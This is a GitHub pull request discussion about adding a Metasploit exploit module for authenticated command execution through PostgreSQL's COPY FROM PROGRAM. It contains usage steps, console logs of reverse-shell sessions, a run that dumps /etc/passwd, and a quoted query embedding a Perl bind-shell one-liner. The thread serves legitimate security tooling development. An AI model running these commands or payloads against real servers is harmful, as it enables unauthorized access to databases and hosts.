Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adding new Postgres_cmd_execution module #11598

Merged
merged 41 commits into from May 7, 2019

Conversation

Projects
None yet
5 participants
@Greenwolf
Copy link
Contributor

commented Mar 20, 2019

PostgreSQL from 9.3 to latest has functionality allowing the database superuser & users in the 'pg_execute_server_program' group to execute OS commands.

Explanation:
https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

This is my first run through of a Metasploit module so I would appreciate anyone helping me clean it up. It currently works on OSX & Linux by providing a cmd stager (like cmd/unix/reverse_perl), and on windows by first starting up a PowerShell download cradle, then putting the command in the COMMAND parameter. It feels a little hacky though 馃榿

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/postgres/postgres_cmd_execution_nine_three
  • set RHOST target.ip.add.ress
  • set payload cmd/unix/reverse_perl
  • set PASSWORD postgres
  • set USERNAME postgres
  • set DATABASE postgres
  • set LHOST my.ip.add.ress
  • set LHOST myport
  • exploit
Adding new Postgres_cmd_execution module
PostgreSQL from 9.3 to latest has functionality allowing the database superuser & users in the 'pg_read_server_files' group to execute OS commands. 

Explanation:
https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

This is my first run through of a Metasploit module so I would appreciate anyone helping me clean it up. It currently works on OSX & Linux by providing a cmd stager (like cmd/unix/reverse_perl), and on windows by first starting up a PowerShell download cradle, then putting the command in the COMMAND parameter. It feels a little hacky though 馃榿
@bcoles

This comment has been minimized.

Copy link
Contributor

commented Mar 21, 2019

Please run ./tools/dev/msftidy.rb modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb on this module and resolve the following issues:

[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb - [INFO] No CVE references found. Please check before you land!
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb - [ERROR] '>' is a bad character in module title.
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:19 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:20 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:23 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:26 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:30 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:65 - [WARNING] Please use snake case on method names: def tablename; datastore['TABLENAME']; end 
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:69 - [WARNING] Please use snake case on method names: def command; datastore['COMMAND']; end 
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:100 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:104 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:126 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:144 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb - [WARNING] Please add a newline at the end of the file
------------------------------------------------------------------------
@bcoles

This comment has been minimized.

Copy link
Contributor

commented Mar 21, 2019

Please add some module documentation for this module.

bcoles and others added some commits Mar 21, 2019

Update modules/exploits/multi/postgres/postgres_cmd_execution_nine_th鈥
鈥ee.rb

Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented Mar 21, 2019

Hi @bcoles, Thank you for all your tips and advice, i've implemented all the fixes you requested to the code in my branch. I'm having an issue with this last tidy option though:

$ ./tools/dev/msftidy.rb ~/Desktop/postgres-cmd-execution/post_gres_bcole_fixes.rb
~/Desktop/postgres-cmd-execution/post_gres_bcole_fixes.rb - [WARNING] Unexpected and potentially incorrect super class found ('Msf::Exploit::Remote')

Do you know why it would be saying it's a potentially incorrect super class?

I'll just work on that documentation now.

Greenwolf added some commits Mar 21, 2019

@bcoles

This comment has been minimized.

Copy link
Contributor

commented Mar 21, 2019

Do you know why it would be saying it's a potentially incorrect super class?

msftidy is confused because the module path ~/Desktop/postgres-cmd-execution/post_gres_bcole_fixes.rb is located outside of the framework.

@module_type is defined based on the path:

@module_type = File.dirname(File.expand_path(@full_filepath))[/\/modules\/([^\/]+)/, 1]

Later:

    if prefix_super_map.key?(@module_type)
      unless super_class =~ prefix_super_map[@module_type]
        error("Invalid super class for #{@module_type} module (found '#{super_class}', expected something like #{prefix_super_map[@module_type]}")
      end
    else
      warn("Unexpected and potentially incorrect super class found ('#{super_class}')")
    end
@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented Mar 21, 2019

Ah ok, so i guess that one isn't an issue once it's merged in. I've also created the documentation you requested. Let me know if you need anything else?

@bcoles

This comment has been minimized.

Copy link
Contributor

commented Mar 21, 2019

The module name should describe the vulnerable functionality. I haven't read your blog post yet (nor this PR code), but presumable something like PostgreSQL pg_read_server_files Command Execution would be suitable. You might be able to come up with something better,

The module file name should match the module name, ie postgres_pg_read_server_files_cmd_exec.

@bcoles

This comment has been minimized.

Copy link
Contributor

commented Mar 21, 2019

Ah ok, so i guess that one isn't an issue once it's merged in.

msftidy is run as part of the automated Travis CI tests. It won't be confused, because the file is located at the correct path.

@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented Mar 21, 2019

Well its anyone in the pg_read_server_files group + superusers, i think superusers will be more common though. The flaw is that Postgres has a COPY TO/FROM PROGRAM function, similar to xp_cmdshell, so i'll do something around that

@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented Mar 21, 2019

How about:
postgres_copy_from_program_cmd_exec

Greenwolf added some commits Mar 21, 2019

@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented Mar 21, 2019

I also added you to authors for your assistance:
'bcoles' # metasploit module assistance

Greenwolf added some commits Mar 21, 2019

@bcoles

This comment has been minimized.

Copy link
Contributor

commented Mar 21, 2019

I also added you to authors for your assistance:
'bcoles' # metasploit module assistance

Thanks, but please remove. I haven't done anything.

Also, I probably won't have time to review, test and land this PR. Someone else will take over.

@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented Mar 21, 2019

Done, does everything look good so far though? I applied all your changes. Not sure why the travis-ci continuous integration is failing though.

Update modules/exploits/multi/postgres/postgres_copy_from_program_cmd鈥
鈥exec.rb

Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
@bcoles

This comment has been minimized.

Copy link
Contributor

commented Apr 12, 2019

I still haven't tested this module. Leaving it for @wvu-r7

My only remaining observation is that print_error "#{peer} - Unknown" is used half a dozen times, but offers no insight into what went wrong. There's also not much in the way of print messages, making diagnosing what went wrong almost impossible without manually modifying the module, as the user is provided only Unknown.

For example. a failed exploit would return trying exploit; error unknown; exploit failed as the only feedback to the user regardless of where the exploitation failed. This is problematic for debugging purposes.

A more detailed error message in each instance would be nice.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 12, 2019

I last tested this exploit and found the latest commit did not work. The original commit worked if I fixed the syntax error within. See #11598 (comment). I haven't had time to debug further yet.

@bcoles bcoles dismissed their stale review Apr 13, 2019

msftidy issues resolved

@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented Apr 15, 2019

@wvu-r7 I'm having problems with my metasploit install breaking so I haven't been able to get to this. Could either of you please advise which line to change? i'm a bit confused my the previous linked comment.

@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented Apr 15, 2019

Appears to be working for me

msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options

Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   DATABASE           postgres         yes       The database to authenticate against
   DUMP_TABLE_OUTPUT  false            no        select payload command output from table (For Debugging)
   PASSWORD           postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS             192.168.0.25     yes       The target address range or CIDR identifier
   RPORT              5432             yes       The target port (TCP)
   TABLENAME          iSpvelJiCi       yes       A table name that does not exist (To avoid deletion)
   USERNAME           postgres         yes       The username to authenticate as


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.27     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.29
RHOSTS => 192.168.0.29
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

[*] Started reverse TCP handler on 192.168.0.27:4444 
[*] 192.168.0.29:5432 - 192.168.0.29:5432 - PostgreSQL 10.7 (Ubuntu 10.7-1.pgdg18.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0, 64-bit
[*] 192.168.0.29:5432 - Exploiting...
[+] 192.168.0.29:5432 - 192.168.0.29:5432 - iSpvelJiCi dropped successfully
[+] 192.168.0.29:5432 - 192.168.0.29:5432 - iSpvelJiCi created successfully
[+] 192.168.0.29:5432 - 192.168.0.29:5432 - iSpvelJiCi copied successfully(valid syntax/command)
[+] 192.168.0.29:5432 - 192.168.0.29:5432 - iSpvelJiCi dropped successfully(Cleaned)
[*] 192.168.0.29:5432 - Exploit Succeeded
[*] Command shell session 1 opened (192.168.0.27:4444 -> 192.168.0.29:55890) at 2019-04-15 22:04:50 +0100

whoami
postgres
^C
Abort session 1? [y/N]  y
""

[*] 192.168.0.29 - Command shell session 1 closed.  Reason: User exit

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 15, 2019

@Greenwolf: Can you test against https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193 with this PR merged against upstream/master?

I do the following:

git fetch --all
git checkout upstream/master
git merge --no-ff --no-edit upstream/pr/11598
bundle install

In your case, you can supply your own branch in place of the PR branch.

@wvu-r7 wvu-r7 dismissed their stale review Apr 15, 2019

DUMP_TABLE_OUTPUT implemented.

@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented Apr 16, 2019

Hi @wvu-r7, I can't seem to checkout? I'm probably not doing it correctly:

$ git clone https://github.com/rapid7/metasploit-framework
Cloning into 'metasploit-framework'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (18/18), done.
remote: Total 491869 (delta 6), reused 6 (delta 0), pack-reused 491851
Receiving objects: 100% (491869/491869), 386.05 MiB | 850.00 KiB/s, done.
Resolving deltas: 100% (360420/360420), done.
Checking out files: 100% (9723/9723), done.
$ cd metasploit-framework/
$ git fetch --all
Fetching origin
$ git checkout upstream/master
error: pathspec 'upstream/master' did not match any file(s) known to git
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 16, 2019

If you cloned from https://github.com/rapid7/metasploit-framework, origin is upstream. You should work off your fork. Are you using the command line or the web UI?

@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented Apr 16, 2019

I've done it from the web UI so far; forking, new files, edits

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 16, 2019

Add more commits by pushing to the postgres_cmd_execution_nine_three branch on Greenwolf/metasploit-framework.

Hmm, I have an idea to short-circuit my suggestion.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 16, 2019

wvu@kharak:/rapid7/metasploit-framework:HEAD$ git push-remote Greenwolf postgres_cmd_execution_nine_three
Counting objects: 2552, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (929/929), done.
Writing objects: 100% (2552/2552), 551.34 KiB | 6.72 MiB/s, done.
Total 2552 (delta 2021), reused 2095 (delta 1608)
remote: Resolving deltas: 100% (2021/2021), completed with 222 local objects.
To wvu-r7.github.com:Greenwolf/metasploit-framework
   6f92b98ba2..c03ee656a3  HEAD -> postgres_cmd_execution_nine_three
wvu@kharak:/rapid7/metasploit-framework:HEAD$

Hax.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 16, 2019

Try testing this branch again, please. Are you using https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193 ?

@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented Apr 16, 2019

Unfortunately I'm still having problems:

$ git push-remote Greenwolf postgres_cmd_execution_nine_three
git: 'push-remote' is not a git command. See 'git --help'.

Also no i'm testing it against a Ubuntu 18.04 VM which i installed PostgreSQL 10.7 on and enabled remote access.

@bcoles

This comment has been minimized.

Copy link
Contributor

commented Apr 17, 2019

Unfortunately I'm still having problems:

$ git push-remote Greenwolf postgres_cmd_execution_nine_three
git: 'push-remote' is not a git command. See 'git --help'.

Also no i'm testing it against a Ubuntu 18.04 VM which i installed PostgreSQL 10.7 on and enabled remote access.

That's not going to work on your system. push-remote is a git alias which wvu has defined.

Effectively, wvu is asking you to test this module on the latest version of Metasploit.

If you're not familiar with git, the easiest solution is to make sure your Metasploit is up to date, then just paste the code from this PR into a module and test it.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 17, 2019

Thank you, @bcoles. Apologies for not explaining it. Yes, I would like us to be testing the same environment with the same code.

VulHub's environment is also 10.7, but I'm encountering a Postgres syntax error on table DROP. It may be a library bug, which is why I'm trying to suss it out this way.

And yeah, it works fine if I use the original commit (after adding a comma) or if I use psql directly. Something is amiss about the latest commit or its interaction with the library code.

#11598 (comment)

@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented Apr 23, 2019

Good Morning @wvu-r7 & @bcoles , I got round to looking at this. When i use a generic command with it, it works fine on the latest version of metasploit.

msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options

Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   DATABASE           template1        yes       The database to authenticate against
   DUMP_TABLE_OUTPUT  false            no        select payload command output from table (For Debugging)
   PASSWORD           postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS             127.0.0.1        yes       The target address range or CIDR identifier
   RPORT              5432             yes       The target port (TCP)
   TABLENAME          i4pyFlvzBfd      yes       A table name that does not exist (To avoid deletion)
   USERNAME           postgres         yes       The username to authenticate as


Payload options (cmd/windows/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   cat /etc/passwd  yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   3   Windows (CMD)


msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DUMP_TABLE_OUTPUT true
DUMP_TABLE_OUTPUT => true
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

[*] 127.0.0.1:5432 - 127.0.0.1:5432 - PostgreSQL 10.7 (Debian 10.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit
[*] 127.0.0.1:5432 - Exploiting...
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - i4pyFlvzBfd dropped successfully
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - i4pyFlvzBfd created successfully
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - i4pyFlvzBfd copied successfully(valid syntax/command)
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - i4pyFlvzBfd contents:
{:complete=>#<Msf::Db::PostgresPR::Connection::Result:0x00007fd837695408 @rows=[["root:x:0:0:root:/root:/bin/bash"], ["daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"], ["bin:x:2:2:bin:/bin:/usr/sbin/nologin"], ["sys:x:3:3:sys:/dev:/usr/sbin/nologin"], ["sync:x:4:65534:sync:/bin:/bin/sync"], ["games:x:5:60:games:/usr/games:/usr/sbin/nologin"], ["man:x:6:12:man:/var/cache/man:/usr/sbin/nologin"], ["lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin"], ["mail:x:8:8:mail:/var/mail:/usr/sbin/nologin"], ["news:x:9:9:news:/var/spool/news:/usr/sbin/nologin"], ["uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin"], ["proxy:x:13:13:proxy:/bin:/usr/sbin/nologin"], ["www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"], ["backup:x:34:34:backup:/var/backups:/usr/sbin/nologin"], ["list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin"], ["irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin"], ["gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin"], ["nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin"], ["_apt:x:100:65534::/nonexistent:/bin/false"], ["postgres:x:999:999::/var/lib/postgresql:/bin/bash"], ["Debian-exim:x:101:101::/var/spool/exim4:/bin/false"]], @fields=[#<struct Msf::Db::PostgresPR::RowDescription::FieldInfo name="filename", oid=16396, attr_nr=1, type_oid=25, typlen=-1, atttypmod=-1, formatcode=0>], @cmd_tag="SELECT 21">}
[*] 127.0.0.1:5432 - Exploit Succeeded
[*] Exploit completed, but no session was created.

However when I try to use a reverse or bind shell, i run into issues like this:

[!] 127.0.0.1:5432 - 127.0.0.1:5432 - Unable to execute query: COPY i4pyFlvzBfd FROM PROGRAM 'perl -MIO -e ''$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};''';

I've verified once again however that it does work on a ubuntu 18.04 install with Postgres 10.7. If you wish to confirm you'll need to set a password for the postgres user, and allow remote authentication.

@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented May 6, 2019

Hey @wvu-r7 & @bcoles, are we all happy for this to be merged?

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented May 7, 2019

Sorry for the longer-than-usual delay on this. I'm happy enough with the code, and since you've repro'd this on 9.3, I'll trust you!

There are still bugs on Postgres 10.x, but they appear to be library-related and outside the scope of this PR. I'm shipping this as is until someone wants to take a stab at fixing the bugs. Thank you!

I hope the protracted back-and-forth on this PR hasn't deterred you from contributing again. I hope the next time around won't have any esoteric bugs!

@wvu-r7 wvu-r7 merged commit c03ee65 into rapid7:master May 7, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wvu-r7 added a commit that referenced this pull request May 7, 2019

msjenkins-r7 added a commit that referenced this pull request May 7, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented May 7, 2019

Release Notes

The multi/postgres/postgres_copy_from_program_cmd_exec exploit module has been added to the framework. This module exploits PostgreSQL >= 9.3, given there are known credentials and the pg_execute_server_program default role is enabled for the user.

@Greenwolf

This comment has been minimized.

Copy link
Contributor Author

commented May 7, 2019

Not at all, thank you both for the help and advice on fixing up the module, I learned a lot and I'm looking forward to contributing again 馃檪

@ccondon-r7

This comment has been minimized.

Copy link
Contributor

commented May 8, 2019

Nice work, @Greenwolf, and thanks for your patience! We'll see if we can get this module into the next Metasploit demo.

@bcoles

This comment has been minimized.

Copy link
Contributor

commented May 21, 2019

I just noticed that the module prints peer unnecessarily, resulting in duplicated output. Not sure how this was overlooked during review, as the output is also included in the module documentation.

     msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

    [*] Started reverse TCP handler on 192.168.0.18:4456
    [*] 192.168.0.25:5432 - 192.168.0.25:5432 - PostgreSQL 11.2 (Ubuntu 11.2-1.pgdg18.04+1) on x86_64-pc-linux-g
    [*] 192.168.0.25:5432 - Exploiting...
    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable dropped successfully
    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable created successfully
    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable copied successfully(valid syntax/command)
    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable dropped successfully(Cleaned)
    [*] 192.168.0.25:5432 - Exploit Succeeded
    [*] Command shell session 2 opened (192.168.0.18:4456 -> 192.168.0.25:51784) at 2019-03-24 18:07:11 +0000

It seems both the following PostgreSQL modules make use of excessive use of peer.

  • modules/exploits/multi/postgres/postgres_createlang.rb
  • modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented May 21, 2019

Wow, I missed it in my own testing, too. Death to the peer gods. #6526

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can鈥檛 perform that action at this time.